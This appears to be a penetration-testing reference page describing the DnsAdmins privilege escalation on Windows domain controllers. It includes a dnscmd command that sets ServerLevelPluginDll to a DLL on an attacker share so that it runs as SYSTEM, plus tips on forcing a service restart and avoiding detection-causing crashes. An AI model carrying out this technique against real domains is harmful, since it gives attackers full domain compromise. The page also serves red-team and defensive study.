DnsAdmins

Members of DnsAdmins manage the DNS server, and the Microsoft DNS service exposes a server-level plugin DLL feature: a path in ServerLevelPluginDll that the service loads at startup. The service (dns.exe) runs as SYSTEM on the domain controller, and the path is loaded without validation. So a DnsAdmins member points it at a malicious DLL on a share, restarts the service, and gets SYSTEM code execution on the DC, which is domain compromise.

The attack#

ServerLevelPluginDll is a DNS server property set through the DNS management RPC (it is not an AD LDAP attribute), so dnscmd is the native way to set it; the gate is write access to that property, which DnsAdmins, or a DACL on the DNS server object, grants:

bash
# From a DnsAdmins member: point the plugin DLL at an attacker share
dnscmd <dc> /config /serverlevelplugindll \\attacker\share\evil.dll

The DLL only needs to export DnsPluginInitialize (and the other plugin entry points); your payload runs from there as SYSTEM. The catch is that the DLL loads only when the DNS service restarts, and default DnsAdmins members cannot stop/start the service remotely. So you either wait for a legitimate restart (or host reboot), pair with a service-control right (Server Operators), or use the DNS-management RPC reload that Semperis documented (which has operational side effects). Afterwards, clear the ServerLevelPluginDll value and let DNS restart to restore service.

Exploitation notes#

  • The gate is the DNS service restart, and default DnsAdmins members cannot restart it remotely; wait for a restart or reboot, use a service-control right (Server Operators), or the documented DNS-RPC reload. Pair accordingly.
  • An invalid or crashing DLL breaks DNS for the domain, which is disruptive and noisy, so test the DLL and restore the config promptly.
  • This is a classic "almost-DA" group to hunt for in ACL enumeration / BloodHound; DnsAdmins is frequently handed out to helpdesk or server teams.
  • The same serverLevelPluginDll write is reachable through any DACL edge that lets you modify the DNS server object, not only group membership.

Tools#

  • dnscmd: native, sets ServerLevelPluginDll via the DNS management RPC.
  • dnsserver RPC tooling (for example dnsserver.py-style clients): set the plugin DLL remotely.
  • A separate service-restart right (Server Operators) or a host reboot: load the DLL (default DnsAdmins cannot restart the service).

References#

Cookie Consent

We use cookies to enhance your experience. Learn more